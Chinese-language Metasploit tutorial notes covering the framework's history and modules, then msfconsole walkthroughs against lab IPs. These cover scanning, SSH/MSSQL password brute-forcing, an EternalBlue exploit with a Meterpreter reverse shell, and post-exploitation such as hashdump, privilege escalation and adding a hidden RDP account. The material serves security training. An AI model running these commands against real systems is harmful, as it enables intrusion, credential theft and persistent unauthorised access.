目录
Metasploit 简介
Metasploit 是一个开源的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台(可扩展),此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境(MSF最牛逼的地方)。它的商业版本非常厉害(贵!)
* 诞生与发展
Metasploit 项目最初是由HD Moore 在2003 年夏季创立,目标是成为渗透攻击研究与代码开发的一个开放资源(目标:就是想把很多渗透测试的工具做一个集成,而且这些工具是可以修改的,根据不同环境进行定制)。
HD Moore在2003 年的10月发布了他的第一个基于Perl 语言(pl)的Metasploit 版本,当时一共集成了11个渗透攻击模块。
在Spoonm 的帮助下,完全重写了Metasploit 的代码,并在2004 年4月发布了Metasploit v2.0 ,版本中已经包含了18个渗透攻击模块和27 个攻击载荷(payload),并提供了控制台终端,命令行和Web 三个使用接口。【举例:假设某一个系统当中存在一个远程代码执行漏洞,就是我们可以执行命令,执行命令这个攻击操作是渗透攻击模块来完成的。攻击载荷就是我们在利用这个漏洞的同时,打通一个隧道、建立一个连接。就是我们在漏洞利用工具执行代码的时候,执行的是payload,payload的作用就是打通一个隧道,类似反弹shell一样】
在2004 年8月,HD 和Spoonm 带着最新发布的Metasploit v2.2 并在拉斯维加斯举办的BlackHat 全球黑客大会上进行了演讲。听众被Metasploit 的强大之处所折服,并一致认为:Metasploit 时代已经到来。更多的黑客加入Metasploit 核心开发团队与贡献渗透攻击、载荷与辅助模块代码。
在2005 年的CanSecWest 黑客会议上,HD 和Spoonm 指出了Metasploit v2 体系框架中的一些难以解决的难题,包括:
· 缺乏跨平台支持,特别是不能很好地运行在Windows 系统上。
· 很难支持自动化渗透攻击过程
· Perl 语言的复杂性和缺点使得外部贡献者与用户规模增长不相适应
· Perl 语言对一些复杂特性的支持能力较弱等。
而且v2 版本是完全围绕着渗透攻击而设计的,对信息搜集与后渗透攻击阶段无法提供有效支持。经过18个月的时间,Metasploit 团队使用Ruby 语言完全重写了Metasploit ,并在2007 年5月发布了v3.0 版本,其中包含177 个渗透攻击模块、104 个攻击载荷模块以及30 个新引入的辅助模块(这里面的辅助模块,可以简单理解为扫描爆破模块,扫描端口、主机、漏洞等)。
Metasploit v3.0 的发布使得Metasploit 不在限于用作渗透攻击软件,而真正成为一个事实上的渗透测试技术研究与开发平台。
2009 年10月,Metasploit 项目被一家渗透测试技术领域的知名安全公司Rapid7 所收购。Rapid7 公司随后与2010 年10月推出了Metasploit Express 和Pro 商业版本。
Metasploit v4.0 在2011 年8 月发布。v4.0 版本在渗透攻击、攻击载荷与辅助模块的数量上都有显著的扩展,此外还引入一种新的模块类型——后渗透攻击模块(就是做一个长期的权限维持,做一个攻击成果的进一步扩展),以支持在渗透攻击环节中进行敏感信息搜集、内网拓展等一系列的攻击测试。
Metasploit v5.0 在2019 年1月份发布。Metasploit 5.0 使用了新的数据库,并提供了一种新的数据服务。新版本引入了新的规避机制(evasion capabilities)【这个模块专门用来免杀,就是逃过杀毒软件得到查杀】,支持多项语言,框架建立在不断增长的世界级攻击性内容库的框架基础上。另外,此次更新还包括了可用性改进和大规模开发的支持,数据库和自动化 API 的改进等。
我们现在用的都是5.0/6.0版本
* 技术架构
@ 辅助模块
Metasploit 为渗透测试的信息搜集环节提供了大量的辅助模块支持,包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码(就是构建钓鱼网站)、口令猜测破解、敏感信息嗅探、探查敏感信息泄露、Fuzz 测试发掘漏洞、实施网络协议欺骗等模块。
辅助模块能够帮助渗透测试者在渗透攻击之前取得目标系统丰富的情报信息。
@ 渗透攻击模块
渗透攻击模块是利用发现的安全漏洞或配置弱点对目标系统进行攻击,以植入和运行攻击载荷,从而获取对远程目标系统访问权的代码组件。
主动渗透攻击所利用的安全漏洞位于网络服务端软件与服务承载的上层应用程序之中,由于这些服务通常是在主机上开启一些监听端口并等待客户端连接,因此针对它们的渗透攻击可以主动发起,通过连接目标系统网络服务,注入一些特殊构造的包含"邪恶"攻击数据的网络请求内容,触发安全漏洞,并使得远程服务进程执行在"邪恶"数据中包含攻击载荷,从而获取目标系统的控制会话。
被动渗透攻击利用的漏洞位于客户端软件中,如浏览器、浏览器插件、电子邮件客户端、Office 与Adobe 等各种文档阅读与编辑软件。对于这类存在于客户端软件的安全漏洞,我们无法主动地将数据从远程输入到客户端软件中,因此只能采用被动渗透攻击的方式,即构造出"邪恶"的网页、电子邮件或文档文件,并通过架设包含此类恶意内容的服务、发送邮件附件、结合社会工程学分发并诱骗目标用户打开、结合网络欺骗和劫持技术等方式,等目标系统上的用户访问到这些邪恶的内容,从而触发客户端软件中的安全漏洞,给出控制目标系统的Shell 会话。
主动渗透攻击就是对方开一个服务,然后你主动去打它
被动渗透攻击就是你整一个钓鱼网站/植入木马...这个需要受害者主动触发
比如攻击office软件,Adobe。。。客户端软件,就是被动渗透测试攻击
@ 攻击载荷模块
攻击载荷是在渗透攻击成功后使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接。
比如发现RCE远程代码执行漏洞,我们到底让他执行什么代码,让他执行payload,payload的作用就是建立一个会话,就是一个隧道
@ 空指令模块
空指令(NOP) 是一些对程序运行状态不会造成任何实质影响的空操作或者无关操作指令,最典型的空指令就是空操作,在x86 CPU 体系架构平台上的操作码是0x90 。
@ 编码器模块
攻击载荷模块与空指令模块组装完成一个指令序列后,在这段指令被渗透攻击模块加入邪恶数据缓冲区交由目标系统运行之前,Metasploit 框架还需要完成一道非常重要的工序--编码。
编码器模块的第一个使命就是确保攻击载荷中不会出现渗透攻击过程中应加以避免的"坏字符"。(坏字符:比如00,字符串的结束,类似于这些字符都给你做一个编码)
编码器的第二个使命就是对攻击载荷进行"免杀"处理。
@ 后渗透攻击模块
后渗透攻击模块主要支持在渗透攻击取得目标系统控制权之后,在受控系统中进行各式各样的后渗透攻击动作,比如获取敏感信息、进一步拓展、实施跳板攻击等。
@ 免杀模块
对攻击载荷进行"免杀"处理。
*为什么使用Metasploit ?
渗透攻击是目前Metasploit 最强大和最具吸引力的核心功能,Metasploit 框架中集成了数百个针对主流操作系统平台上 不同网路服务于应用软件安全漏洞的渗透攻击模块,可以由用户在渗透攻击场景中根据漏洞扫描结果进行选择,并能够自由装配该平台上适用的具有指定功能的攻击载荷,然后通过自动化编码机制绕过攻击限制与检测,对目标系统实施远程攻击。获取系统的访问控制权。
除了渗透攻击之外,Metasploit 在发展过程中逐渐增加了对渗透测试全过程的支持,包括情报搜集、威胁建模、漏洞分析、后渗透攻击与报告生成。
其实我们开发版本比Pro版本要强大,就是少了生成报告的功能,而且Pro版本是有售后的,这就是区别。开发版本要比商业版本里面脚本要多很多,各有利弊。
MSF可以贯穿我们整个渗透测试的全过程,就相当于一个工具在手,天下我有,号称MSF可以日穿宇宙(但是burpsuite是不可取代的)
@ 情报搜集阶段
MSF有一个比较牛逼的地方就是它可以去集成数据库,就是你把你所有的结果都可以存到数据库里面(作用:1、数据保存,方便后期导出渗透测试报告 2、共享)
Metasploit 一方面通过内建的一系列扫描器与查点辅助模块来获取远程服务器信息,另一方面通过插件机制集成调用Nmap、Nessus、OpenVAS 等著名业界的开源网路扫描工具,从而具备全面的信息搜集能力,为渗透攻击实施提供必不可缺德精确情报。(MSF可以自动集成Nmap、Nessus、OpenVAS)
@威胁建模阶段
在搜集信息之后,Metasploit 支持一系列数据库命令操作直接将这些信息汇总至PostgreSQL、MYSQL、SQLite数据库中,并为用户提供易用的数据库查询命令,可以帮助渗透测试者对目标系统搜到的情报进行威胁建模,从中找出可行的攻击路径(就是寻找一些最可行的攻击路径)
@ 漏洞分析阶段
除了信息搜集环节能够直接扫描出一些已公布德安全漏洞之外,Metassploit 中还提供了大量德协议Fuzz 测试器与Web 应用漏洞探测分析模块,支持具有一定水平能力德渗透测试者在实际过程中尝试挖掘出0day 漏洞,并对漏洞机理与利用方法进行深入分析,而这将为渗透攻击目标带来更大的杀伤力,并提升渗透测试流程的技术含金量。
@后渗透攻击阶段
在成功实施渗透攻击并获取目标系统的远程控制权之后,Metasploit 框架中另一个极具威名的工具Meterpreter 在后渗透攻击阶段提供了强大的功能。
Meterpreter 可以看作一个支持多操作系统平台,可以 仅仅驻留于内存中并具备免杀能力的高级后门工具,Meterpreter 中实现了特权提升、信息抓取、系统监控、跳板攻击与内网拓展等多样化的功能特性,此外还支持一种灵活可扩展的方式来加载额外的功能的后渗透攻击模块
@ 报告生成阶段
Metssploit 框架获得的渗透测试结果可以输入至内置数据库中,因此这些结果可以通过数据库查询来获取,并辅助渗透测试报告的写作。
商业版(pro)具备了更强大的报告生成功能,可以输出HTML、XML、Word 和PDF格式的报告。
MSF使用
启动MSF
[msfconsole]
MSF 的安装目录:
[/usr/share/metasploit-framework/] kali的工具都按照在/usr/share这个目录下
MSF的更新
[apt-get update] # 更新索引
[apt-get install metasploit-framework] #重新安装
MSF当中有一些模块,它都是以模块出现,什么是模块简单理解:一个模块就是一个rb 脚本(ruby脚本)
基本命令
info 查看模块的详细信息
set 设置
show options
exploit
back 返回主目录
exit 退出msf
情报搜集
*网站敏感目录扫描
可以借助Metasploit 中的brute_dirs、dir_listing、dir_scanner 等辅助模块来进行敏感目录扫描。
他们主要使用暴力猜解的方式工作,主要此处需要提供一个目录字典。
msf5 > use auxiliary/scanner/http/dir_scanner //auxiliary(a.附属的)叫辅助模块 辅助模块下的扫描器,扫描http的,去扫描敏感命令的 //我们use的时候要从辅助模块开始进
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200 //可以用set命令做一些设置 set rhost:设置远程地址
RHOSTS => 192.168.1.200
msf5 auxiliary(scanner/http/dir_scanner) > set PATH /cms/ //set path就是设置web起始路径
PATH => /cms/
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 50 //给50个线程
THREADS => 50
msf5 auxiliary(scanner/http/dir_scanner) > exploit //开始进行攻击
dir_scanner 模块可以发现网站上的一些目录,Admin、admin、images。只要字典足够强大,可以找到更多的敏感目录。(这个敏感命令扫描跟御剑比较像)
目录扫描实验演示:
对cms文章管理系统做一个目录扫描(打开win2k8:192.168.3.129)
1、开启msf
msfconsole2、使用扫描模块
use auxiliary/scanner/http/ 发现http里面有261个扫描模块上图这261个都是专门做http扫描的,那这些模块究竟怎么用?如何用
3、进入dir_scanner模块
use auxiliary/scanner/http/dir_scanner
这个模块怎么用呢?命令info 查看我们这个模块的详细信息对cms网站做一个目录的扫描:
扫描目标:http://192.168.3.129/cms/4、设置目标的地址(RHOSTS)
set RHOSTS 192168.3.1295、起始路径是/cms/
set PATH /cms/显示配置信息:show options
6、设置线程
set THREADS 507、exploit进行扫描(取决于你的字典是否强大)
*主机发现
Metasploit 中提供了一些辅助模块可用于主机的发现,这些模块位于
modules/auxiliary/scanner/discovery/目录下
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/empty_udp
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
auxiliary/scanner/discovery/udp_probe
auxiliary/scanner/discovery/udp_sweep
可以使用arp_sweep 来枚举本地局域网中的所有活跃主机(nmap比他快多了)
---------使用命令----------------
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.2/24
RHOSTS => 192.168.1.2/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set ThREADS 50
ThREADS => 50
msf5 auxiliary(scanner/discovery/arp_sweep) > exploit
------------------------
*端口扫描
Metasploit 的辅助模块中提供了几款实用的端口扫描器
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/syn
auxiliary/scanner/portscan/xmas
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/tc
一般情况下推荐使用syn 端口扫描器,因为他速度快,结果比较准确不易被对方察觉
-----使用命令--------
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf5 auxiliary(scanner/portscan/syn) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/portscan/syn) > exploit
---------------
*探测服务详细信息
在Metasploit 中使用一些插件可以调用系统中的命令,比如可以使用Nmap 探测目标的详细服务信息,命令
[nmap -sS -Pn 192.168.1.200 -sV],参数说明:
-sS 使用SYN 半连接扫描
-Pn 早扫描之前,不发生ICME echo 请求测试目标是否活跃
-sV 探测服务详细版本
*服务查点
在Metassploit 的辅助模块中,有很多用于服务扫描和查点的工具,这些工具通常以[service_name]_version 命名。该模块可用于遍历网络中包含的某种服务的主机,并进一步确定服务版本。
@ telnet 服务查点
telnet 是一个先天缺乏安全性的网络服务。由于Telnet 没有对传输的数据进行加密,越来越多的管理员渐渐使用更为安全的SSH 协议代替它 。尽管如此,很多价格昂贵、使用寿命长的大型交换机使用Telnet 协议的可能性更大,而此类交换机在网络中的位置一般来说非常重要。可以使用telnet_version 模块扫描一下是否有主机或设备开启了Telnet 服务
nmap是查某一个主机开放了哪些服务
我们这个telnet扫描是查看哪些主机开启了telnet
一正一反结合着用
msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/telnet/telnet_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/telnet/telnet_version) > exploit
@ ssh服务查点
通常管理员会使用SSH 对服务器进行远程管理,服务器会向SSH 客户端返回一个远程Shell 连接。如果没有做其他的安全增强配置,只要获取服务的登录口令,就可以使用SSH 客户端登录服务器,那就相当于获取了登录用的所有权限。
可以使用ssh_version 模块遍历网络中开启的SSH 服务的主机
-------------
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_version) > exploit
---------------
实验演示:扫描内外中开启SSH的主机有哪些
我们用的是use auxiliary/scanner/ssh/ssh_version
back返回主目录(exit退出msf)
1、
2、
192.168.3.132是我们kali的ip,扫出这台主机开了ssh,我们尝试爆破
3、 use auxiliary/scanner/ssh/ssh_login(ssh_login是爆破模块)
USER_AS_PASS是用户名和密码反向4、这里面我们准备一个字典
5、
相应的我们可以去爆破ssh、telnet、mysql、MSSQL、ftp....
@ MSSL 服务查点
可以使用mysql_ping 查找网络模块中的Microsoft SQL Server
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/mssql/mssql_ping) > exploit
*口令猜测
@ ssh 服务口令猜解
----------------
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/msf/user.dic
USER_FILE => /root/msf/user.dic
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/msf/pass.dic
PASS_FILE => /root/msf/pass.dic
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
-----------------
@ MSSQL 服务口令猜解
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 172.16.132.135
RHOSTS => 172.16.132.135
msf5 auxiliary(scanner/mssql/mssql_login) > set USER_FILE /root/dic/user.dic
USER_FILE => /root/dic/user.dic
msf5 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /root/dic/pwd.dic
PASS_FILE => /root/dic/pwd.dic
msf5 auxiliary(scanner/mssql/mssql_login) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/mssql/mssql_login) > exploit
网络服务渗透攻击
*MS17-010 “永恒之蓝”
漏洞扫描
---------------
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
-----------------
攻击
------------------
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.150
LHOST => 192.168.1.150
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
----------------
永恒之蓝实验演示:
1、
2、
3、
4、
发现win2008(192.168.3.129存在永恒之蓝漏洞)
5、
6、
进入meterpreter
*参数说明
-p
--payload
<payload>
指定需要使用的payload (攻击载荷)
-f
--format
<format>
指定输出格式
-l
--list
<module_type>
列出指定模块的所有资源
-n
--nopsled
<length>
为payload 预先指定一个NOP 滑动长度
-e
--encoder
[encoder]
指定需要使用的encoder(编码器)
-a
--arch
<architecture>
指定payload 的目标架构
Meterpreter
Meterpreter是Metasploit的默认Windows系统下的Shell Code
以前Meterpreter只是Metasploit入侵时短期凑活一下用的
一旦入侵成功后就尽快上传远控
但是现在新一代的Meterpreter变得异常强大
我甚至感觉许多情况下用Meterpreter进行操作就足够了
特色功能1:快速提权
Getsystem命令快速提权
实在没有比这个简单的了
一条指令你就拥有了System权限
Meterpreter会自己尝试用多种方法让你获得System权限
特色功能2:Hashdump
运行这个命令:run post/windows/gather/hashdump
一条命令你就能够获得Windows的Sam 数据库里的内容
就是经过加密的用户名和密码
特色功能3:直接打开3389
Getgui命令是Meterpreter新添加的命令
这个命令能够让你轻松的在目标系统上打开3389远程管理
这条命令有两个用法:run getgui -e(仅仅是打开远程管理)
run getgui -u hacker -p s3cr3t(打开远程管理并且创造一个新的用户名为Hacker密码为s3cr3t的帐号)
特色功能4:网络嗅探
Meterpreter拥有非常强大的网络嗅探能力
它能够不在目标系统上安装任何驱动的情况下进行网络嗅探
而且它还聪明到了自己的流量要被忽略掉
特色功能5:网络中继
往往入侵局域网黑客碰到的最大困难时无法穿过NAT
现在有了Meterpreter就轻松了
Meterpreter能够让一台你已经入侵的电脑变成中继,来入侵同一个局域网里的其他电脑
特色功能6:截屏
截屏看到对方电脑上正在做什么
这个功能很容易理解吧
*常用基本命令
详细:https://www.cnblogs.com/backlion/p/9484949.html
命令 | 解释 |
background | 将Meterpreter 终端隐藏在后台(也就是说你进入这个meterpreter之后我还想用其他模块,还想保持这个会话) |
sessions | 查看已经成功获取的会话。-i 选项,切入后台会话 |
shell | 获取系统的控制台shell |
quit | 关闭当前的额Meterpreter 会话,返回MSF 终端 |
pwd | 获取目标主机当前的工作目录 |
cd | 切换目录 |
ls | 查看当前目录下的内容 |
cat | 查看文件内容 |
edit | 编辑文件 |
download | 下载文件 |
search | 搜索文件 |
ifconfig/ipconfig | 查看网卡信息 |
route | 查看路由信息,设置路由 |
sysinfo | 查看系统信息 |
getuid | 获取当前用户id |
ps | 查看进程 |
getpid | 查看当前进程 |
migrate | 切换进程 |
execute | 执行文件 |
kill | 终极指定PID 的进程 |
shutdown | 关机 |
screenshot | 屏幕快照 |
如果我们拿到 Meterpreter我们能做什么事?
部分命令演示
1、background 将Meterpreter 终端隐藏在后台
2、怎么切回来?sessions -i
3、shell 获取系统的控制台shell
退出cmd用exit
4、quit 关闭当前的额Meterpreter 会话,返回MSF 终端
5、pwd 显示当前工作目录(目标主机的)
6、cd 切换路径(用两根斜线)
cd c:也行7、ls 显示当前路径下所有内容(跟linux命令很像,但是不是linux命令)
8、upload 上传文件
upload /root/msf/test.txt9、cat 查看文件
10、edit 编辑文件
11、download 下载文件(下载的默认路径就是你启用msf的路径)
12、search 搜索文件
search -h查看帮助13、ifconfig/ipconfig查看网卡信息
14、sysinfo 查看系统信息
15、getuid 获取当前用户权限
16、ps查看进程
17、getpid查看当前进程
17、migrant 切换进程
在执行migrant切换进程的时候有风险,虽然msf可以无缝切换,但是容易把会话切掉
只能往下切,不能网上切18、execute 执行文件
execute -h查看帮助打开2008发现:
19、kill 杀死进程
20、shutdown
21、screenshot 屏幕快照
22、键盘记录:https://blog.csdn.net/nzjdsds/article/details/102767480